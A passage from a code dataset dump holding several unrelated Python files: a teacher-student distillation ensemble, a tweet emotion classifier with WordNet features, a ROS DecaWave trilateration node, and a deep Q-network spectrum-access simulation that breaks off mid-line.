self.weight_lin(inp)\n if self.softmax_fixed_weight:\n dynamic_weight = dynamic_weight.softmax(dim=-1)\n \n if self.weight_prob:\n return_dict[\"dynamic_weight_avg\"] = torch.sum(probs * dynamic_weight, dim=-1).unsqueeze(1)\n else:\n return_dict[\"dynamic_weight_avg\"] = torch.sum(logits * dynamic_weight, dim=-1).unsqueeze(1).sigmoid()\n \n return_dict[\"dynamic_weight_logit_soft\"] = \\\n (torch.sum(logits * dynamic_weight, dim=-1).unsqueeze(1) / self.T).sigmoid()\n\n if self.use_rand:\n soft_logits = logits / self.T\n v_mean = soft_logits.mean(dim=-1).unsqueeze(1)\n v_var = soft_logits.std(dim=-1).unsqueeze(1)\n var_soft_label = v_mean + torch.randn(self.batch_size, 1).to(self.device) * v_var\n return_dict[\"var_soft_label\"] = var_soft_label.sigmoid()\n \n\n if self.use_gating:\n gating_inp = s_input\n\n if self.res_prob:\n prob_var = self.gating(gating_inp).squeeze()\n return_dict[\"modified_logits_t_avg_sig\"] = (prob_var + (logits / self.T).mean(dim=-1)).sigmoid().unsqueeze(1) \n return_dict[\"modified_logits_t_sig_avg\"] = (prob_var + (logits / self.T).sigmoid().mean(dim=-1)).sigmoid().unsqueeze(1)\n else:\n weight = (self.gating(gating_inp) / self.g_T).softmax(dim=-1)\n return_dict[\"logits_t_sig_w_avg\"] = (weight * (logits/self.T).sigmoid()).sum(dim=-1).unsqueeze(1)\n return_dict[\"logits_t_w_avg_sig\"] = (weight * (logits/self.T)).sum(dim=-1).sigmoid().unsqueeze(1)\n return_dict[\"gate_weight\"] = weight\n return_dict[\"gate_prob\"] = (weight * probs).sum(-1).unsqueeze(1)\n\n return return_dict\n \n\n\n def forward(self, inputs):\n if self.local <= 0: # fixed: with the default local=-1, inputs carry only (Xi, Xv, y); `not self.local` was always False here\n Xi, Xv, y = inputs\n Xi, Xv, y = Xi.long().to(self.device), Xv.float().to(self.device), \\\n y.float().to(self.device)\n else:\n Xi, Xv, y, teacher_logits = inputs\n Xi, Xv, y, teacher_logits = Xi.long().to(self.device), Xv.float().to(self.device), \\\n y.float().to(self.device), teacher_logits.float().to(self.device)\n \n self.batch_size = y.size(0)\n \n if len(self.teacher_list) > 0 or self.local > 0:\n if self.local <= 0:\n teacher_sig_tensor = torch.cat([teacher(inputs)[\"sig_score\"] \n for teacher in self.teacher_list], dim=-1)\n else:\n teacher_sig_tensor = teacher_logits\n \n \n 
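# (added note, assumptions based on merge_teachers above) teacher_sig_tensor is expected to\n # have shape [batch, n_teachers]; e.g. (teacher_sig_tensor / self.T).mean(dim=-1).sigmoid()\n # is the temperature-smoothed average used as the \"logits_t_avg_sig\" soft label.\n 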
student_dict = self.student(inputs[0: 3])\n soft_prob = (student_dict[\"sig_score\"] / self.T).sigmoid()\n \n merged_dict = self.merge_teachers(teacher_sig_tensor, student_dict[\"learning\"], labels=y)\n \n if self.use_gating and self.gate_only:\n weight = 1 / (merged_dict[\"prob_std\"] ** 2) if self.std_weight else None\n gate_loss = self.cross_entropy_fn(merged_dict[\"gate_prob\"], y, weight=weight)\n return_dict = {\n \"loss\": gate_loss,\n \"prob\": merged_dict[self.soft_label_type]}\n return return_dict\n \n soft_label = merged_dict[self.soft_label_type] \n \n student_loss = student_dict[\"loss\"]\n \n if self.gate_only and (self.use_fixed_weight or self.use_dynamic_weight):\n loss = self.course_loss_fn(merged_dict[self.soft_label_type], y)\n return_dict = {\"loss\": loss, \"prob\": merged_dict[self.soft_label_type]}\n return return_dict\n else:\n if self.use_gating:\n weight = 1 / (merged_dict[\"prob_std\"] ** 2) if self.std_weight else None # fixed: weight was undefined on this path\n course_loss = self.cross_entropy_fn(soft_prob, soft_label, weight=weight)\n else:\n if self.use_kl:\n soft_prob = soft_prob.log()\n course_loss = self.course_loss_fn(soft_prob, soft_label.detach())\n \n \n loss = (1 - self.gamma) * student_loss \\\n + self.gamma * course_loss \n \n if self.both_loss:\n loss = 0.1 * student_loss + \\\n 0.8 * self.cross_entropy_fn(soft_prob, merged_dict[\"logits_t_sig_avg\"]) + \\\n 0.1 * self.cross_entropy_fn(soft_prob, merged_dict[\"logits_t_w_avg_sig\"])\n \n # if self.std_gamma > 0:\n # student_std = self.aux_layer(student_dict[\"learning\"]).sigmoid()\n # teacher_std = merged_dict[\"probs\"].std(dim=-1).unsqueeze(1)\n # std_loss = self.student.loss_fn(student_std, teacher_std)\n # loss += self.std_gamma * std_loss\n \n return_dict = {\"loss\": loss, \"prob\": student_dict[\"prob\"]}\n return return_dict\n else:\n student_dict = self.student(inputs[0:3])\n loss = student_dict[\"loss\"]\n return_dict = {\"loss\": loss, \"prob\": student_dict[\"prob\"]}\n return return_dict\n \n \n\ndef seed_everything(seed=1029):\n random.seed(seed)\n os.environ['PYTHONHASHSEED'] = str(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n torch.backends.cudnn.deterministic = True\nseed_everything()\n\n\nif __name__ == \"__main__\":\n xi = np.array([[1,2,3,4],[2,1,3,4],[2,1,3,2],[2,1,3,2]])\n xv = np.array([[3,1,1,1],[2,1,3,4],[2,1,3,2],[2,1,3,2]])\n y = np.array([1,0,1,1])\n \n xi = torch.LongTensor(xi)\n xv = torch.FloatTensor(xv)\n y = torch.FloatTensor(y).view(-1, 1)\n total_num_feature = 5\n feature_len = 4\n device = torch.device(\"cpu\")\n \n \n teacher = DeepFM(total_num_feature, feature_len, device, embedding_size=100)\n student = DNN(total_num_feature, feature_len, device, embedding_size=100)\n \n model = ensemble(student, [teacher], share_embedding=False) # fixed: __init__ expects (student_net, teacher_net_list); loading teacher weights also needs teacher_state_dict_list\n optimizer = optim.Adam(model.parameters(), lr=3e-4)\n return_dict = model.forward([xi, xv, y])\n print(return_dict[\"loss\"])\n# return_dict[\"loss\"].backward()\n# print(model.teacher_model.Embedding_1d.weight.grad)\n \n ","sub_path":"model/Compressor/ensemble.py","file_name":"ensemble.py","file_ext":"py","file_size_in_byte":15059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"606096048","text":"# coding=utf-8\nfrom twokenize import tokenize\nimport numpy\nimport scipy\nimport sys\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn import cross_validation\nfrom sklearn import svm\nfrom scipy import sparse\nimport numpy as np\nfrom nltk.corpus import wordnet as wn\n\n\n# helper function to convert a text file to an array (one line in 
each array entry)\ndef file_to_array(filename):\n\tfile = open(filename)\n\tarray = np.array([])\n\tfor line in file:\n\t\tarray = np.append(array, line.rstrip())\n\tfile.close()\n\treturn array\n\n# helper function to convert label list from multilabel to binary for a given emotion\ndef to_binary_classification(classifications, emotion):\n\tbinary_class = np.array([])\n\tfor item in classifications:\n\t\tif item == emotion:\n\t\t\tbinary_class = np.append(binary_class, True)\n\t\telse:\n\t\t\tbinary_class = np.append(binary_class, False)\n\treturn binary_class\n\n# helper function to convert label list from multilabel to binary for a given emotion\ndef to_binary_classification_merged(classifications, emotion_1, emotion_2):\n\tbinary_class = np.array([])\n\tfor item in classifications:\n\t\tif (item == emotion_1) | (item == emotion_2):\n\t\t\tbinary_class = np.append(binary_class, True)\n\t\telse:\n\t\t\tbinary_class = np.append(binary_class, False)\n\treturn binary_class\n\n# returns a sklearn vectorizer for unigrams and bigrams (ngram_range=(1,2))\n# params: vocab (false--get vectorizer for all features, or true--get vectorizer for predefined feature list)\n#\t\t emotion (emotion to get vectorizer for, only needed if vocab=true)\ndef get_token_vectorizer(vocab=False, emotion=\"\"):\n\tif vocab:\n\t\tfilename = \"featurelists/\" + emotion + \"_tokens\"\n\t\tvocab = file_to_array(filename)\n\t\tvectorizer = CountVectorizer(ngram_range=(1,2), tokenizer=tokenize, analyzer='word', vocabulary=vocab)\n\telse:\n\t\tvectorizer = CountVectorizer(ngram_range=(1,2), tokenizer=tokenize, analyzer='word')\n\treturn vectorizer\n\ndef get_token_vectorizer_merged(vocab=False, emotion_1=\"\", emotion_2=\"\"):\n\tif vocab:\n\t\tfilename_1 = \"featurelists/\" + emotion_1 + \"_tokens\"\n\t\tvocab_1 = file_to_array(filename_1)\n\n\t\tfilename_2 = \"featurelists/\" + emotion_2 + \"_tokens\"\n\t\tvocab_2 = file_to_array(filename_2)\n\n\t\tvocab = np.concatenate((vocab_1, vocab_2)) # fixed: elementwise '+' is not defined for numpy string arrays\n\t\tvectorizer = CountVectorizer(ngram_range=(1,2), tokenizer=tokenize, analyzer='word', vocabulary=vocab)\n\telse:\n\t\tvectorizer = CountVectorizer(ngram_range=(1,2), tokenizer=tokenize, analyzer='word')\n\treturn vectorizer\n\n\n# returns a sklearn vectorizer for wordnet synsets and hypernyms\n# params: vocab (false--get vectorizer for all features, or true--get vectorizer for predefined feature list)\n#\t\t emotion (emotion to get vectorizer for, only needed if vocab=true)\ndef get_wordnet_vectorizer(vocab=False, emotion=\"\"):\n\tif vocab:\n\t\tfilename = \"featurelists/\" + emotion + \"_wordnet\"\n\t\tvocab = file_to_array(filename)\n\t\tvectorizer = CountVectorizer(tokenizer=get_synsets_hypernyms, analyzer='word', vocabulary=vocab)\n\telse:\n\t\tvectorizer = CountVectorizer(tokenizer=get_synsets_hypernyms, analyzer='word')\n\treturn vectorizer\n\n# def find_emotion_svc(tweets_list, emotion_list):\n# \tfor emotion in emotion_list:\n# \t\tterm_mx = compute_feature_mx(get_features(emotion), tweets_list)\n# \t\tclf = get_classfier(emotion)\n# \t\tpredictions = clf.predict(term_mx)\n\n# def compute_feature_mx(features, tweets):\n# \tvectorizer = CountVectorizer(ngram_range=(1,3), tokenizer=tokenize, analyzer='word', vocabulary=features)\n# \tterm_mx = vectorizer.fit_transform(tweets)\n# \treturn term_mx\n\n# function to get wordnet synsets and recursive hypernyms from every word in tweet\ndef get_synsets_hypernyms(text):\n\t# get individual tokens\n\ttokens = tokenize(text)\n\tsynsets = [] \t # synset names\n\tsynset_objs = [] # corresponding synset 
objects\n\tfor token in tokens:\n\t\t# get all synsets for a token\n\t\ttoken_synsets = wn.synsets(token)\n\t\tfor synset in token_synsets:\n\t\t\tif synset.name() not in synsets:\n\t\t\t\t# add synset name and object to list\n\t\t\t\tsynsets.append(\"s.\" + synset.name())\n\t\t\t\tsynset_objs.append(synset)\n\t# once all synsets are found, add all recursive hypernyms for each synset\n\tsynsets += get_hypernyms_recursive(synset_objs)\n\treturn synsets\n\n# function to get all recursive hypernyms for a list of synsets\ndef get_hypernyms_recursive(synsets):\n\tall_hypernyms = []\n\tfor synset in synsets:\n\t\t# get hypernyms for given synset\n\t\thypernyms = []\n\t\t_recurse_hypernyms(synset, hypernyms)\n\t\tif hypernyms != []:\n\t\t\tall_hypernyms += hypernyms\n\thypernym_strings = []\n\t# get list of all hypernym names\n\tfor hypernym in all_hypernyms:\n\t\thypernym_str = \"h.\" + hypernym.name()\n\t\tif hypernym_str not in hypernym_strings:\n\t\t\thypernym_strings.append(hypernym_str)\n\treturn hypernym_strings\n\n# recurse over all hypernyms for synset\ndef _recurse_hypernyms(synset, hypernyms):\n\tsynset_hypernyms = synset.hypernyms()\n\tif synset_hypernyms:\n\t\t# add all hypernyms to list\n\t\thypernyms += synset_hypernyms\n\t\t# recurse to get hypernyms of each hypernym on this level\n\t\tfor hypernym in synset_hypernyms:\n\t\t\t_recurse_hypernyms(hypernym, hypernyms)\n\n# function for greedy additive feature selection algorithm\n# should produce reduced list of features\ndef greedy_feature_select(term_mx, labels, feature_names):\n\n\tclf = svm.LinearSVC()\n\n\ttotal_features = term_mx\t\t# full feature-document mx\n\tcurrent_features = np.array([]) # feature-doc mx for selected features\n\tcurrent_feature_names = []\t\t# selected feature names\n\tused_feature_idxs = []\t\t\t# indices for features that have already been selected\n\n\tprev_score = 0\t\t\t# f1 score from previous iteration of loop\n\tstill_improving = True \t# boolean for whether to continue iterating\n\twhile (still_improving):\n\t\tmax_score = 0\t# best f1 score so far\n\t\tbestFeature = 0 # index of feature that, when added, gives best f1 score so far\n\t\t# print(\"current feature list: \" + str(current_feature_names))\n\n\t\t# loop over all features in total matrix\n\t\tfor j in range(0, int(total_features.shape[1])):\n\t\t\tif j not in used_feature_idxs:\n\t\t\t\t# make test mx by adding col j of total matrix to mx of already selected features\n\t\t\t\tif current_features.size == 0:\n\t\t\t\t\ttestFeatures = total_features.getcol(j)\n\t\t\t\telse:\n\t\t\t\t\ttestFeatures = scipy.sparse.hstack([current_features,total_features.getcol(j)])\n\n\t\t\t\t# get k-fold cross val score for test matrix\n\t\t\t\t# if average better than existing max score, save this score and feature\n\t\t\t\tscores = cross_validation.cross_val_score(clf, testFeatures, labels, scoring='f1', cv=5)\n\t\t\t\tif scores.mean() > max_score and bestFeature not in used_feature_idxs:\n\t\t\t\t\tmax_score = scores.mean()\n\t\t\t\t\tbestFeature = j\n\n\t\t# continue iterating as long as adding a feature improves the score\n\t\tif (max_score > prev_score):\n\t\t\t# add next best feature to feature list if it improves overall score\n\t\t\tif current_features.size == 0:\n\t\t\t\tcurrent_features = total_features.getcol(bestFeature)\n\t\t\telse:\n\t\t\t\tcurrent_features = scipy.sparse.hstack([current_features, 
total_features.getcol(bestFeature)])\n\t\t\tcurrent_feature_names.append(feature_names[bestFeature])\n\t\t\tused_feature_idxs.append(bestFeature)\n\t\t\tprev_score = max_score\n\t\telse:\n\t\t\tstill_improving = False\n\n\t# print accuracy, precision, recall, f1 scores\n\taccuracy = cross_validation.cross_val_score(clf, current_features, labels, scoring='accuracy', cv=5)\n\tprecision = cross_validation.cross_val_score(clf, current_features, labels, scoring='precision', cv=5)\n\trecall = cross_validation.cross_val_score(clf, current_features, labels, scoring='recall', cv=5)\n\tf1 = cross_validation.cross_val_score(clf, current_features, labels, scoring='f1', cv=5)\n\n\tprint(\"Accuracy: \" + str(accuracy) + \"\\n\")\n\tprint(\"Precision: \" + str(precision) + \"\\n\")\n\tprint(\"Recall: \" + str(recall) + \"\\n\")\n\tprint(\"F1: \" + str(f1) + \"\\n\")\n\n\t# return selected feature names for saving\n\treturn current_feature_names\n","sub_path":"Thesis/Thesis Code/svc_emotions.py","file_name":"svc_emotions.py","file_ext":"py","file_size_in_byte":7727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"639243612","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport rospy\n\nfrom snowmower_msgs.msg import DecaWaveMsg\nfrom ubo_pkg.msg import AnchorPosMsg\nfrom ubo_pkg.msg import AnchorPosArray\nfrom ubo_pkg.msg import TagPosMsg\n\nfrom time import sleep\nfrom math import sqrt\n\nclass Env:\n\n\t# anchor1 is assumed to be at the origin of the frame, anchor2 on the x-axis\n\t# listAnch is a table holding the coordinates of the different anchors\n\tlistAnch = {\"anchor0\":(0,0), \"anchor1\":(0,0), \"anchor2\":(0,0)}\n\n\t# tag holds the coordinates of the tag\n\ttag = (0,0) \n\n\tdef __init__(self):\n\n\t\t# Method called when a message containing the inter-anchor distances is received.\n\t\t# It updates the distances stored in the listAnch table if the received set is not erroneous\n\t\tdef updateAnchor(msg):\n\n\t\t\t# If any of the 3 distance values equals 0, the set is considered erroneous and the update is ignored\n\t\t\t# The first value is always zero, so only the rest of the array is scanned\n\t\t\tif all(elem != 0 for elem in msg.dist[1:]):\n\n\t\t\t\t# Retrieve the values\n\t\t\t\td0_1 = msg.dist[1]\n\t\t\t\td0_2 = msg.dist[2]\n\t\t\t\td1_2 = msg.dist[3]\n\n\t\t\t\t# Initialize the origin of the frame, anchor1, and the point on the x-axis, anchor2, using the distance separating them\n\t\t\t\tEnv.listAnch[\"anchor1\"] = (0,0)\n\t\t\t\tEnv.listAnch[\"anchor2\"] = (d1_2,0)\n\n\t\t\t\t# Compute the coordinates of anchor0 from its distances to the two other anchors.\n\t\t\t\t# The detailed derivation is in production$\\Robots\\Decawave\\Poc\\15-07-2016 (the computed coordinates are those of A0, not A2, in our case)\t\t\n\t\t\t\tx = d1_2**2 - d0_2**2 + d0_1**2\n\t\t\t\tx /= d1_2*2\n\n\t\t\t\ty = sqrt(abs(d0_1**2 - x**2))\t\t\n\t\t\n\t\t\t\tEnv.listAnch[\"anchor0\"] = (x,y)\n\n\t\t\t\t# In practice the coordinates of anchor0 and the distance between anchor1 and anchor2 will never be exactly 0.\n\t\t\t\t# If one of the computed values is zero, we consider that an error occurred somewhere and do not take them into account\n\t\t\t\tif (x != 0 and y != 0 and d1_2 != 0):\n\t\t\t\t\t\n\t\t\t\t\t# Create the messages to send\n\t\t\t\t\tanchMsg0 = AnchorPosMsg()\n\t\t\t\t\tanchMsg0.coord = 
Env.listAnch[\"anchor0\"]\n\t\t\t\t\tanchMsg1 = AnchorPosMsg()\n\t\t\t\t\tanchMsg1.coord = Env.listAnch[\"anchor1\"]\n\t\t\t\t\tanchMsg2 = AnchorPosMsg()\n\t\t\t\t\tanchMsg2.coord = Env.listAnch[\"anchor2\"]\n\n\t\t\t\t\t# Envoi sur le topic /anchorPos d'un tableau contenant les coordonnees des ancres\n\t\t\t\t\tanchArray = AnchorPosArray()\n\t\t\t\t\tanchArray.header.frame_id = \"environnement\"\n\t\t\t\t\tanchArray.header.stamp = rospy.get_rostime()\n\t\t\t\t\tanchArray.anchor0 = anchMsg0\n\t\t\t\t\tanchArray.anchor1 = anchMsg1\n\t\t\t\t\tanchArray.anchor2 = anchMsg2\n\t\t\t\t\tpubAnch.publish(anchArray)\n\n\t\t# Methode appelee lors de la reception d'un message contenant les distances entre le tag et les ancres.\n\t\t# Elle met a jour les distances contenues dans le tableau listAnch si le set d'erreur recu est non erronne\n\t\tdef updateTag(msg):\n\n\t\t\t# Si l'une des 3 valeurs de distance est egale de 0, on considere le set comme erronne et on ignore la mise a jour\n\t\t\t# La derniere valeure est toujours nulle donc on parcours seulement le reste du tableau\n\t\t\tif all(elem != 0 for elem in msg.dist[:3]):\n\n\t\t\t\t# Recuperation des valeurs\n\t\t\t\td0_t = msg.dist[0]\n\t\t\t\td1_t = msg.dist[1]\n\t\t\t\td2_t = msg.dist[2]\n\t\t\n\t\t\t\t# On utilise la meme methode de calcul qu'au dessus pour calculer la position du tag a partir de ancre1 et ancre2\n\t\t\t\tx = Env.listAnch[\"anchor2\"][0]**2 - d2_t**2 + d1_t**2\n\t\t\t\tif Env.listAnch[\"anchor2\"][0] != 0:\n\t\t\t\t\tx /= 2*Env.listAnch[\"anchor2\"][0]\n\t\t\t\t# BFA le 5/9/16\t\t\t\t\n\t\t\t\telse:\n\t\t\t\t\treturn\n\n# Il y a cependant ici une ambiguite a resoudre car le tag a deux positions ou il peut se trouver.\n# Pour connaitre la position reelle, on prend la position pour laquelle la distance au tag s'approche le plus de la distance renvoyee par les balises\n\t\t\t\ty1 = sqrt(abs(d1_t**2 - x**2))\n\t\t\t\ty2 = -y1\n\n\t\t\t\td0_t1 = sqrt(abs(x - Env.listAnch[\"anchor0\"][0])**2 + abs(y1 - Env.listAnch[\"anchor0\"][1])**2)\n\t\t\t\td0_t2 = sqrt(abs(x - Env.listAnch[\"anchor0\"][0])**2 + abs(y2 - Env.listAnch[\"anchor0\"][1])**2)\n\n\t\t\t\tif (abs(d0_t - d0_t1) < abs(d0_t - d0_t2)):\n\t\t\t\t\tEnv.tag = (x, y1)\n\t\t\t\telse:\n\t\t\t\t\tEnv.tag = (x, y2)\n\n\t\t\t\t# Si les coordonnes calculees du tag sont non nulles (meme raison que precedemment), on envoie un message.\n\t\t\t\t# Le message est sur le topic /tagPos et contient simplement les coordonnes du tag \n\t\t\t\tif (x != 0 and Env.tag[1] != 0):\n\t\t\t\t\ttagMsg = TagPosMsg()\n\t\t\t\t\ttagMsg.header.frame_id = \"environnement\"\n\t\t\t\t\ttagMsg.header.stamp = rospy.get_rostime()\n\t\t\t\t\ttagMsg.coord = Env.tag\n\t\t\t\t\tpubTag.publish(tagMsg)\n\n\n\t\t# Publishers et subscribers\n\t\tpubTag = rospy.Publisher(\"tagPos\", TagPosMsg, queue_size=10)\n\t\tpubAnch = rospy.Publisher(\"anchorPos\", AnchorPosArray, queue_size=10)\n\t\trospy.Subscriber(\"dw/t0/data\", DecaWaveMsg, updateTag, queue_size=10)\t\n\t\trospy.Subscriber(\"dw/a0/data\", DecaWaveMsg, updateAnchor, queue_size=10)\n\n\t\trospy.spin()\n\n\nif __name__ == '__main__':\n\n\trospy.init_node(\"environnement\")\n\n\tenv = Env()\n\n\n","sub_path":"ubo_pkg/scripts/environnement.py","file_name":"environnement.py","file_ext":"py","file_size_in_byte":5016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"476478951","text":"from multi_user_network_env import env_network\nfrom drqn import QNetwork, Memory\nimport numpy as np\nimport sys\nimport 
matplotlib.pyplot as plt\nfrom collections import deque\nimport os\nimport tensorflow as tf\nimport time\n\nTIME_SLOTS = 100000 # number of time-slots to run simulation\nNUM_CHANNELS = 2 # Total number of channels\nNUM_USERS = 3\nNUM_SIZE = 3\nATTEMPT_PROB = 1 # attempt probability of ALOHA based models\n# TABLE = np.array([[0,1,2],[3,4,5],[6,7,8]])\n# TABLE = np.arange((NUM_CHANNELS+1) * ((NUM_SIZE-1)*3 + 1)).reshape(((NUM_CHANNELS+1)), ((NUM_SIZE-1)*3 + 1))\nTABLE = np.arange((NUM_CHANNELS+1) * NUM_SIZE**NUM_SIZE ).reshape(((NUM_CHANNELS+1) , NUM_SIZE**NUM_SIZE))\nCHANNEL_CAPACITY = 7\n\n# It creates a one hot vector of a number as num with size as len\ndef one_hot(num, len):\n assert num >= 0 and num < len, \"error\"\n vec = np.zeros([len], np.int32)\n vec[num] = 1\n return vec\n\n# generates next-state from action and observation\ndef state_generator(action, obs):\n input_vector = []\n if action is None:\n print('None')\n sys.exit()\n for user_i in range(action.size):\n x, y = np.where(TABLE == action[user_i])\n index = np.array(list(zip(x, y)))\n\n input_vector_i = one_hot(index[0][0], NUM_CHANNELS + 1)\n # size_choose = one_hot(index[0][1], NUM_SIZE)\n size_choose = one_hot(index[0][1], NUM_SIZE**NUM_SIZE)\n channel_alloc = obs[-1]\n # input_vector_i = np.append(input_vector_i, size_choose)\n input_vector_i = np.append(input_vector_i, np.append(size_choose, channel_alloc))\n input_vector_i = np.append(input_vector_i, int(obs[user_i][0])) # ACK\n input_vector.append(input_vector_i)\n return input_vector\n\nmemory_size = 3000 # size of experience replay deque\nbatch_size = 6 # Num of batches to train at each time_slot\npretrain_length = batch_size # this is done to fill the deque up to batch size before training\nhidden_size = 128 # Number of hidden neurons\nlearning_rate = 0.0001 # learning rate\nexplore_start = .02 # initial exploration rate\nexplore_stop = 0.01 # final exploration rate\ne_greedy=0.9\ndecay_rate = 0.0001 # rate of exponential decay of exploration\ngamma = 0.9 # discount factor\nnoise = 0.1\nstep_size = 6 # length of history sequence for each datapoint in batch\nstate_size = NUM_CHANNELS + 1 + NUM_SIZE**NUM_SIZE + NUM_CHANNELS + 1 + 1# length of input (2 * k + 2) :k = NUM_CHANNELS\naction_size = (NUM_CHANNELS + 1)* NUM_SIZE**NUM_SIZE # length of output (k+1)\nalpha = 0 # co-operative fairness constant\nbeta = 1 # Annealing constant for Monte - Carlo\n\n# reseting default tensorflow computational graph\ntf.reset_default_graph()\n\n# initializing the environment\nenv = env_network(NUM_USERS, NUM_CHANNELS, NUM_SIZE , ATTEMPT_PROB, TABLE, CHANNEL_CAPACITY)\n\n# initializing deep Q network\nmainQN = QNetwork(name='main', hidden_size=hidden_size, learning_rate=learning_rate, step_size=step_size,\n state_size=state_size, action_size=action_size)\n\n# this is experience replay buffer(deque) from which each batch will be sampled and fed to the neural network for training\nmemory = Memory(max_size=memory_size)\n\n# this is our input buffer which will be used for predicting next Q-values\nhistory_input = deque(maxlen=step_size)\n\n# to sample random actions for each user\naction = env.sample()\nobs = env.step(action)\nstate = state_generator(action, obs)\nreward = [i[1] for i in obs[:NUM_USERS]]\n\n##############################################\nfor ii in range(pretrain_length * step_size * 5):\n action = env.sample()\n obs = env.step(action) # obs is a list of tuple with [[(ACK,REW) for each user] ,CHANNEL_RESIDUAL_CAPACITY_VECTOR]\n next_state = state_generator(action, obs)\n 
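# (added note) this loop only primes the replay deque with random transitions; after it runs,\n # memory.sample(batch_size, step_size) can return full step_size-long histories for training.\n 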
reward = [i[1] for i in obs[:NUM_USERS]]\n memory.add((state, action, reward, next_state))\n state = next_state\n history_input.append(state)\n\ndef get_states_user(batch):\n states = []\n for user in range(NUM_USERS):\n states_per_user = []\n for each in batch:\n states_per_batch = []\n for step_i in each:\n try:\n states_per_step = step_i[0][user]\n except IndexError:\n print(step_i)\n print(\"-----------\")\n print(\"error\")\n sys.exit()\n states_per_batch.append(states_per_step)\n states_per_user.append(states_per_batch)\n states.append(states_per_user)\n # print len(states)\n return np.array(states)\n\ndef get_actions_user(batch):\n actions = []\n for user in range(NUM_USERS):\n actions_per_user = []\n for each in batch:\n actions_per_batch = []\n for step_i in each:\n actions_per_step = step_i[1][user]\n actions_per_batch.append(actions_per_step)\n actions_per_user.append(actions_per_batch)\n actions.append(actions_per_user)\n return np.array(actions)\n\ndef get_rewards_user(batch):\n rewards = []\n for user in range(NUM_USERS):\n rewards_per_user = []\n for each in batch:\n rewards_per_batch = []\n for step_i in each:\n rewards_per_step = step_i[2][user]\n rewards_per_batch.append(rewards_per_step)\n rewards_per_user.append(rewards_per_batch)\n rewards.append(rewards_per_user)\n return np.array(rewards)\n\ndef get_next_states_user(batch):\n next_states = []\n for user in range(NUM_USERS):\n next_states_per_user = []\n for each in batch:\n next_states_per_batch = []\n for step_i in each:\n next_states_per_step = step_i[3][user]\n next_states_per_batch.append(next_states_per_step)\n next_states_per_user.append(next_states_per_batch)\n next_states.append(next_states_per_user)\n return np.array(next_states)\n\ninterval = 1 # debug interval\n# saver object to save the checkpoints of the DQN to disk\nsaver = tf.train.Saver()\n# initializing the session\nsess = tf.Session()\n# initializing all the tensorflow variables\nsess.run(tf.global_variables_initializer())\n# list of total rewards\ntotal_rewards = []\nloss_all = []\nchannel_utilization = []\navg_reward = []\navg_loss = []\navg_channel_utilization = []\n# cumulative reward\ncum_r = [0]\n# cumulative collision\ncum_collision = [0]\n\n\ncheck_index = []\nfor i in range(1,4):\n for j in range(1,4):\n for k in range(1,4):\n check_index.append([i,j,k])\n\n##########################################################################\n#### main simulation loop ########\nfor time_step in range(TIME_SLOTS):\n # changing beta at every 50 time-slots\n if time_step % 50 == 0:\n if time_step < 5000:\n beta -= 0.001\n # current exploration probability\n explore_p = explore_stop + (explore_start - explore_stop) * np.exp(-decay_rate * time_step)\n # Exploration\n if explore_p > np.random.rand():\n # random action sampling\n action = env.sample()\n print(\"explored\")\n # if e_greedy < np.random.rand():\n # # random action sampling\n # action = env.sample()\n # print(\"explored\")\n # Exploitation\n else:\n # initializing action vector\n action = np.zeros([NUM_USERS], dtype=np.int32)\n # converting input history into numpy array\n state_vector = np.array(history_input)\n # print np.array(history_input)\n print(\"///////////////\")\n for each_user in range(NUM_USERS):\n # feeding the input-history-sequence of (t-1) slot for each user separately\n feed = {mainQN.inputs_: state_vector[:, each_user].reshape(1, step_size, state_size)}\n # predicting Q-values of state respectively\n Qs = sess.run(mainQN.output, feed_dict=feed)\n # lstmout = 
sess.run(mainQN.lstm_out, feed_dict=feed)\n # reducedout = sess.run(mainQN.reduced_out, feed_dict=feed)\n # Monte-carlo sampling from Q-values (Boltzmann distribution)\n ##################################################################################\n prob1 = (1 - alpha) * np.exp(beta * Qs)\n # Normalizing probabilities of each action with temperature (beta)\n prob = prob1 / np.sum(np.exp(beta * Qs)) + alpha / (NUM_CHANNELS + 1)\n # # print prob\n # This equation is as given in the paper :\n # Deep Multi-User Reinforcement Learning for\n # Distributed Dynamic Spectrum Access :\n # @Oshri Naparstek and Kobi Cohen (equation 12)\n ########################################################################################\n # choosing action with max probability\n action[each_user] = np.argmax(prob, axis=1)\n # action[each_user] = np.argmax(Qs,axis=1)\n if time_step % interval == 0:\n # print(state_vector)\n print(state_vector[:, each_user])\n # print(state_vector[:, each_user].reshape(1, step_size, state_size))\n # print(lstmout)\n # print(lstmout[:,-1,:])\n # print(reducedout)\n # print(reducedout.shape == lstmout[:,-1,:].shape)\n print(Qs)\n # print(prob, np.sum(np.exp(beta * Qs)))\n # taking action as predicted from the q values and receiving the observation from the environment\n obs = env.step(action) # obs is a list of tuple with [(ACK,REW) for each user ,(CHANNEL_RESIDUAL_CAPACITY_VECTOR)]\n print(action)\n print(obs)\n # Generate next state from action and observation\n next_state = state_generator(action, obs)\n print(next_state)\n # reward for all users given by environment\n reward = [i[1] for i in obs[:NUM_USERS]]\n print(reward)\n # add new experiences into the memory buffer as (state, action , reward , next_state) for training\n memory.add((state, action, reward, next_state))\n state = next_state\n # add new experience to generate input-history sequence for next state\n history_input.append(state)\n\n # calculating sum of rewards\n sum_r = np.sum(reward)\n total_rewards.append(sum_r)\n # calculating cumulative reward\n cum_r.append(cum_r[-1] + sum_r)\n # If NUM_CHANNELS = 2 , total possible reward = 2 , therefore collision = (2 - sum_r) or (NUM_CHANNELS - sum_r)\n r_num = 0\n for r in reward:\n if r > 0:\n r_num += 1\n collision = NUM_CHANNELS - r_num\n # collision = NUM_CHANNELS - sum_r\n # calculating cumulative collision\n cum_collision.append(cum_collision[-1] + collision)\n #############################\n # for co-operative policy we will give reward-sum to each user who has contributed\n # to play co-operatively and rest 0\n # for i in range(len(reward)):\n # if reward[i] > 0:\n # reward[i] = sum_r\n #############################\n\n for i in range(len(action)):\n x, y = np.where(TABLE == action[i])\n index = np.array(list(zip(x, y)))\n size_all = check_index[index[0][1]]\n if obs[i][0] == 1:\n if sum(size_all) <= CHANNEL_CAPACITY:\n channel_utilization.append(sum(size_all) / 